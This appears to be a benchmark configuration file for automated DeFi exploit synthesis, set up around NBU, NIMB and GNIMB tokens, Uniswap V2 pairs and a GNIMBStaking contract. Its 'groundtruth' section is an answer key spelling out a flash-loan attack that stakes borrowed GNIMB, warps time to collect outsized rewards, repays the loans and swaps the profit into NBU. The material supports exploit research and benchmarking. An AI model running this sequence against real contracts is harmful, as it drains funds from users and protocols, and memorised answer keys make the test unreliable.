# Information for benchmarks building.
project_name: "NMB"

ctrt_name2cls:
  - ["nbu", "NBU"]
  - ["nimb", "NIMB"]
  - ["gnimb", "GNIMB"]
  - ["pairnbunimb", "UniswapV2Pair"]
  - ["pairnbugnimb", "UniswapV2Pair"]
  - ["factory", "UniswapV2Factory"]
  - ["router", "UniswapV2Router"]
  - ["gslp", "GNIMBStaking"]

ctrt_name2deploy:
  - ["nbu", "new NBU()"]
  - ["nimb", "new NIMB()"]
  - ["gnimb", "new GNIMB()"]
  - ["pairnbunimb", ""]
  - ["pairnbugnimb", ""]
  - ["factory", ""]
  - ["router", ""]
  - [
      "gslp",
      "new GNIMBStaking(
      address(nbu),
      address(gnimb),
      address(gnimb),
      address(router), 5000)",
    ]

extra_actions:
  - "function deposit_gslp_gnimb_gslp(uint256 amount) internal {
    gnimb.approve(address(gslp), type(uint256).max);
    gslp.stake(amount);
    vm.warp(block.timestamp + 8 * 24 * 60 * 60);
    }"

  - "function withdraw_gslp_gslp_gnimb(uint256 amount) internal {
    gslp.getReward();
    }"

extra_deployments:
  - "gnimb.transfer(address(gslp), 15000000 ether);"

extra_statements: []

attack_goal_str: "nbu"

groundtruth:
  - ["borrow", "gnimb", "owner", "150000e18"]
  - ["deposit", "gslp", "gnimb", "gslp", "150000e18"]
  - ["borrow", "gnimb", "pairnbugnimb", "9000000e18"]
  - ["withdraw", "gslp", "gslp", "gnimb", "gslp.balanceOf(attacker)"]
  - ["payback", "gnimb", "pairnbugnimb", "9000000e18 * 1003 / 1000"]
  - [
      "swap",
      "pairnbugnimb",
      "attacker",
      "gnimb",
      "nbu",
      "gnimb.balanceOf(attacker) - 150000e18 * 1003 / 1000",
      "pairnbugnimb.getAmountOut(gnimb.balanceOf(attacker) - 150000e18 * 1003 / 1000, address(gnimb))",
    ]
  - ["payback", "gnimb", "owner", "150000e18 * 1003 / 1000"]

# Information for search space building.
roles:
  "nbu":
    is_asset: true
    is_erc20: true
    is_stablecoin: true
  "nimb":
    is_asset: true
    is_erc20: true
    is_stablecoin: false
  "gnimb":
    is_asset: true
    is_erc20: true
    is_stablecoin: false
  "gslp":
    is_asset: true

  "pairnbunimb":
    is_swappair: true
    is_uniswap: true
    token_pair: ["nbu", "nimb"]
    support_swaps:
      "nbu": ["nimb", "nbu"]
      "nimb": ["nimb", "nbu"]
    is_oracle: true
    oracle: "pairnbunimb"
    is_lendpool: true

  "pairnbugnimb":
    is_swappair: true
    is_uniswap: true
    token_pair: ["gnimb", "nbu"]
    support_swaps:
      "nbu": ["gnimb", "nbu"]
      "gnimb": ["gnimb", "nbu"]
    is_oracle: true
    oracle: "pairnbugnimb"
    is_lendpool: true

pattern: "BuySell Manipulation"
